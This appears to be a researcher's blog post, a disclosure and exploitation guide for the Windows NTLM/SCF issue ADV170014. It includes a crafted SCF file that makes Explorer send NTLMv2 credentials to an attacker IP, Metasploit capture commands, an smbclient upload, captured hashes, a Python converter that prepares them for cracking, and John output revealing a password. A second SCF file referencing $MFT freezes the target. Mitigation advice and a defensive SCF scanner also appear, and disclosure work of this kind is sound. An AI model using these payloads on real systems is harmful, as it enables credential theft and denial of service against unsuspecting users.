Adv170014 Ntlm Sso: Exploitation Guide

October 2017's Microsoft Patch Tuesday included an optional security advisory, ADV170014. This advisory refers to a bug in the NTLM authentication scheme that allows a malicious attacker to steal hashes and to remotely freeze the vulnerable machine.
I reported this bug on May 24 2017, and it was officially patched by Microsoft on Oct 18 2017.
A total of 148 days was the time Microsoft needed to fix this issue.
I'm making this public now, after October Patch Tuesday, when the official 'solution' went public; now it's up to system administrators to apply the patch in the registry, if their current situation allows it. But we'll come back to that later on.

The vulnerability

It is a known issue that the Microsoft NTLM architecture has some failures; hash stealing is not something new, it is one of the first things a pentester tries when attacking a Microsoft environment.
But most of these techniques require user intervention or traffic interception to fulfil the attack.
These new attacks require no user interaction; everything is done from the attacker's side. But of course, there are some conditions that need to be met for the attack to succeed.

Attack scenario

To execute this attack a shared folder with no password protection is required on the target machine. This is normal behaviour in offices, schools, hospitals and almost all Windows environments; people share folders to share music, photos and documents.
Let's say that the user 'Juan' creates a folder on his Desktop called 'Prueba2', and decides to share that folder with his team.
Vulnerable shared folder in Windows
Now, let's move to the 'Sharing' tab to change the folder properties and allow sharing without using passwords.
Sharing properties tab of the vulnerable folder

Here we can see the shared folder path, \\JUAN-PC\Users\juan\Desktop\prueba2
Now, we must click on 'Network and Sharing Center'
Network and Sharing Center, vulnerable folder properties.

Here we click on the 'Turn off password protected sharing' option; this basically allows any user to access the shared folder without authentication (the share is reached with guest access).

SCF files

SCF files were introduced by Microsoft in the Windows 3.11 era. These are plain text files that instruct Windows File Explorer to execute some basic tasks.
There are already a few SCF file-based attacks, but until now, all these attacks required user intervention to execute the SCF file.
We have two recent examples: the attack created by Bosko Stankovic from DefenseCode in the paper Stealing Windows Credentials Using Google Chrome, and the 2015 Black Hat presentation where Jonathan Brossard and Hormazd Billimoria demonstrated the attack called SMB: Sharing more than just your files.
The basic SCF file structure is as follows:
[Shell]
Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop
Just that. The IconFile entry is what matters for the attack: when Explorer renders the file it fetches the icon from that path, and a UNC path makes it authenticate to the remote host with NTLM. It is worth mentioning that SCF files are one of the more obscure Windows functionalities, and that the documentation is almost non-existent.

The attack: stealing the hash

To perform this attack, we are going to use Metasploit and an SCF file crafted the following way.
root@sysadminjd: # cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop

root@sysadminjd: #
The machine with the IP address 192.168.1.111 is our attacking machine, where we are running the capture/smb Metasploit module.
root@sysadminjd: # msfconsole -q

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE => /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job

[*] Server started.
msf auxiliary(smb) >
We are also going to use John the Ripper to crack the hashes; that's why we define the option JOHNPWFILE, pointing it to the file /tmp/smbhash.txt, where hopefully we'll have our captured hashes.
At this point, the 'Prueba2' folder is totally empty, but there is no need to have it empty.
Vulnerable folder before the attack
With everything in place, we upload the SCF file to the vulnerable folder using any method we want: OS X Finder, Windows File Explorer or, in this case, the command line utility smbclient.
root@sysadminjd: # smbclient //192.168.1.67/Users
WARNING: The "syslog" option is deprecated
Enter root's password:
OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
smb: \> cd juan
smb: \juan\> cd Desktop\
smb: \juan\Desktop\> cd prueba2\
smb: \juan\Desktop\prueba2\> put test.scf
putting file test.scf as \juan\Desktop\prueba2\test.scf (88.9 kb/s) (average 88.9 kb/s)
smb: \juan\Desktop\prueba2\> ls
  .                                   D        0  Mon Oct 23 12:27:15 2017
  ..                                  D        0  Mon Oct 23 12:27:15 2017
  .DS_Store                          AH     6148  Tue May 23 17:29:03 2017
  test.scf                            A       91  Mon Oct 23 12:27:15 2017

		6527487 blocks of size 4096. 4043523 blocks available
smb: \juan\Desktop\prueba2\>
root@sysadminjd: #
The vulnerable folder now contains our SCF file.
Vulnerable folder with the SCF file

At this point, our Metasploit console should be showing something like this
msf auxiliary(smb) >
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:47894338d99abe2f08e2c693618c7323
NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:e97b70559f29462e2ca221d31113b9ca
NT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:eb8b228b739cc95a12d7e0d89d89e002
NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:4abb0803c4afd1509bfca3bbc566ad70
NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5eeb82aab85e9663624aaf6500e4d8f8
NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:55a0cb725a5a171cffdccea36fdcd934
NT_CLIENT_CHALLENGE:010100000000000054118f2c1d4cd301f718b1ba2d4efc7800000000020000000000000000000000
As you can see, a single upload can trigger several authentication requests, so there is no need to worry about that. Note that what Metasploit labels NTHASH here is the NTLMv2 challenge-response (the NTProofStr computed over the server challenge and the client blob), not the user's NT hash: it cannot be used for pass-the-hash, it has to be cracked offline against the challenge it was computed for.
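To make the console records above usable outside Metasploit, here is an added example (my code, not part of the original post or of Metasploit) that groups the captured lines into one record per response, emits the NetNTLMv2 line that John (format netntlmv2) and hashcat (mode 5600) expect, and decodes the timestamp the victim embedded in its NTLMv2 blob. It assumes the module was left on what I take to be its default static server challenge, 1122334455667788; if CHALLENGE was changed in msfconsole, pass the real value. The sample input is the first and fourth records copied from the capture above.

```python
"""Turn Metasploit capture/smb console records into NetNTLMv2 cracker lines
and decode the timestamp each victim put in its NTLMv2 blob.

Added example (not from the original post or from Metasploit). Assumption: the
module ran with its default static server challenge 1122334455667788; if
CHALLENGE was changed in msfconsole, pass the real value to parse_capture().
"""
import re
from datetime import datetime, timedelta, timezone

DEFAULT_CHALLENGE = "1122334455667788"  # assumed capture/smb default

# Sample input: the first and fourth records copied from the console output above.
SAMPLE_CAPTURE = """\
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:47894338d99abe2f08e2c693618c7323
NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:4abb0803c4afd1509bfca3bbc566ad70
NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000
"""

USER_RE = re.compile(r"^USER:(\S+) DOMAIN:(\S+)")
SRC_RE = re.compile(r"Captured from ([\d.]+):(\d+)")


def parse_capture(text, challenge=DEFAULT_CHALLENGE):
    """Group the console lines into one dict per NTLMv2 response."""
    records, cur = [], {}
    for line in text.splitlines():
        line = line.strip()
        if (m := SRC_RE.search(line)):
            cur = {"src": m.group(1), "port": int(m.group(2))}
        elif (m := USER_RE.match(line)):
            cur["user"], cur["domain"] = m.group(1), m.group(2)
        elif line.startswith("NTHASH:"):
            cur["proof"] = line.split(":", 1)[1]  # NTProofStr, not the NT hash
        elif line.startswith("NT_CLIENT_CHALLENGE:"):
            cur["blob"] = line.split(":", 1)[1]
            cur["challenge"] = challenge
            records.append(cur)
            cur = {}
    return records


def cracker_line(rec):
    """NetNTLMv2 line as John (netntlmv2) and hashcat (-m 5600) expect it:
    USER::DOMAIN:server_challenge:NTProofStr:blob"""
    return "{user}::{domain}:{challenge}:{proof}:{blob}".format(**rec)


def blob_timestamp(blob_hex):
    """Client timestamp from the NTLMv2_CLIENT_CHALLENGE structure (MS-NLMP 2.2.2.7):
    RespType(1)=0x01, HiRespType(1)=0x01, Reserved(6), TimeStamp(8, FILETIME LE), ..."""
    raw = bytes.fromhex(blob_hex)
    if len(raw) < 24 or raw[0] != 0x01 or raw[1] != 0x01:
        raise ValueError("not an NTLMv2 blob")
    filetime = int.from_bytes(raw[8:16], "little")  # 100 ns ticks since 1601-01-01
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def report(text, challenge=DEFAULT_CHALLENGE):
    """One (cracker line, UTC timestamp) pair per captured response."""
    return [(cracker_line(r), blob_timestamp(r["blob"])) for r in parse_capture(text, challenge)]


if __name__ == "__main__":
    for line, ts in report(SAMPLE_CAPTURE):
        print(ts.isoformat(), line)
```

The decoded timestamps (16:27 and 16:37 UTC, i.e. 12:27 and 12:37 in the -0400 zone of the console) match the moments the files were written, which is a quick way to confirm that the responses were produced live by the victim and not replayed from somewhere else.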
Now that we have the hashes on our attacking machine, we can use John to try to get the plaintext.
root@sysadminjd: # cd /tmp/
root@sysadminjd:/tmp# john smbhash.txt_netntlmv2
Using default input encoding: UTF-8
Rules/masks using ISO-8859-1
Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s 585124C/s abc
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@sysadminjd:/tmp#
John was able to recover the plaintext; the logged in user 'juan' has a simple password, 'abc'. (Metasploit appends _netntlmv2 to the JOHNPWFILE name, which is why the file we feed to John is smbhash.txt_netntlmv2.)

The attack, freezing the machine

The second attack allows us to freeze the remote machine; let's see how.
We require the same vulnerable folder (we can use the same one we used in the first step), and we also need an SCF file, with a little difference.
root@sysadminjd: # cat mft.scf
[Shell]
Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
root@sysadminjd: #
This SCF file contains a reference to $MFT, which locks the NTFS filesystem; this is discussed in this blog entry (sorry, only Spanish), or you can have a look on the internet for better resources on the topic. Note that the $MFT path-handling bug is a separate NTFS issue that Microsoft has since fixed, so a fully patched machine will not freeze even though the SCF file is still processed.
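Both SCF variants in this post (the UNC IconFile from the hash-stealing step and the $MFT path above) are easy to spot on disk, so here is an added example (my code, not part of the original post) that an administrator can run over a share: it parses each .scf file as the small INI file it is, reads the IconFile entry, and reports whether Explorer would authenticate to a remote host or touch $MFT. The file names and the three sample bodies are constructed for the demo; the first two reproduce the test.scf and mft.scf files shown in this post, the third is the legitimate "Show Desktop" shortcut that ships with Windows.

```python
"""Scan a share for .scf files whose IconFile would make Explorer do something
dangerous. Added example, not from the original post: it covers the two
triggers the post describes, a UNC IconFile (Explorer authenticates to that
host with NTLM, leaking the NetNTLMv2 response) and a path through $MFT (the
NTFS freeze). The sample files below are constructed for the demo.
"""
import os
import re
import tempfile

# \\host\share\... but not the local \\?\ and \\.\ path prefixes
UNC_RE = re.compile(r"^\\\\(?![?.]\\)[^\\]+\\")
MFT_RE = re.compile(r"\$mft(\\|$)", re.IGNORECASE)

SAMPLES = {
    # the file used in the hash-stealing step of this post
    "test.scf": r"""[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
""",
    # the file used in the freeze step of this post (note the space after '=')
    "mft.scf": r"""[Shell]
Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
""",
    # the legitimate "Show Desktop" shortcut shipped with Windows
    "show_desktop.scf": r"""[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,3
[Taskbar]
Command=ToggleDesktop
""",
}


def parse_scf(text):
    """Minimal INI parse -> {section: {key: value}} with names lower-cased.
    Explorer tolerates whitespace around '=', so the parser strips it too."""
    sections, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1].strip().lower()
            sections.setdefault(cur, {})
        elif "=" in line and cur is not None:
            key, val = line.split("=", 1)
            sections[cur][key.strip().lower()] = val.strip()
    return sections


def classify_scf(text):
    """Return 'credential-leak', 'mft-dos', 'local-icon' or 'no-icon'."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    if not icon:
        return "no-icon"
    if UNC_RE.match(icon):
        return "credential-leak"
    if MFT_RE.search(icon):
        return "mft-dos"
    return "local-icon"


def scan_share(root):
    """Walk root and return (path, verdict) for every .scf that is not a plain local icon."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                verdict = classify_scf(fh.read())
            if verdict in ("credential-leak", "mft-dos"):
                findings.append((path, verdict))
    return findings


def demo():
    """Write the constructed samples into a temp dir, scan it, return sorted (name, verdict)."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLES.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return sorted((os.path.basename(p), v) for p, v in scan_share(tmp))


if __name__ == "__main__":
    for name, verdict in demo():
        print(f"{verdict:16} {name}")
```

Point scan_share() at the mounted share (or run it on the server against the shared directory) and anything reported as credential-leak or mft-dos has no business in a folder other people can write to. The check is deliberately limited to IconFile: the page documents no other SCF key that triggers a network access, so the scanner does not guess at any.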
Now, we just upload the SCF file to the vulnerable machine, once more using smbclient
root@sysadminjd: # smbclient //192.168.1.67/Users
WARNING: The "syslog" option is deprecated
Enter root's password:

OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]

smb: \> cd
Default\          desktop.ini       juan\             Public\

smb: \> cd juan\Desktop\prueba2\
smb: \juan\Desktop\prueba2\> ls
  .                                   D        0  Wed May 24 18:08:34 2017
  ..                                  D        0  Wed May 24 18:08:34 2017
  .DS_Store                          AH     6148  Tue May 23 17:29:03 2017
  1.exe                               A     7168  Tue May 23 17:29:03 2017
  prueba.scf                          A       92  Wed May 24 18:08:34 2017

		6527487 blocks of size 4096. 4156104 blocks available

smb: \juan\Desktop\prueba2\> put mft.scf
putting file mft.scf as \juan\Desktop\prueba2\mft.scf (17.6 kb/s) (average 17.6 kb/s)
And that's all; there is no need for more intervention from the attacker or the user, the machine now starts to lock the file system until it needs a reboot.

Who is vulnerable?

According to Microsoft, all Windows versions from 3.11 up to Windows 10, desktop and server, are vulnerable to this kind of attack.
Honestly, I have only tested on Windows 7 and Windows 10, and then I passed the ball to Microsoft.

Mitigation

Microsoft created a sort of patch for this vulnerability, consisting of changing two registry keys to disable NTLM on the system. These registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intention of backporting them to the other versions.
Another issue is that disabling NTLM will break a lot of environments, and that's a huge line of business for them.
My suggestion is to use strong passwords; after the attack we need to crack the hash, which can take a lot of time if the password is complex and can be frustrating for the attacker. Bear in mind that password strength only defends against offline cracking: a captured NTLM authentication can still be relayed to another host that accepts NTLM, so it is not a complete fix on its own.
The better approach: don't share folders without passwords; that'll do the trick.

Acknowledgments in addition to concluding comments

This vulnerability has been around for a long, long time; I have been exploiting it for almost a year now, on my pentesting tasks of course.
It is so simple that it allows almost anybody to exploit it; the good thing is that certain conditions are needed for the exploitation to be successful, and the default Windows configuration is not vulnerable.
I want to thank the Microsoft Security Response Center; they worked hard to try to fix this, and provided a partial patch for the issue, since a full patch was not possible without breaking Windows.
This exploit would not have been possible without the excellent work done by Bosko Stankovic from DefenseCode in the paper Stealing Windows Credentials Using Google Chrome and Jonathan Brossard / Hormazd Billimoria's Black Hat presentation SMB: Sharing more than just your files.
And of course, thank you for reading this quite long blog entry.

Cheers!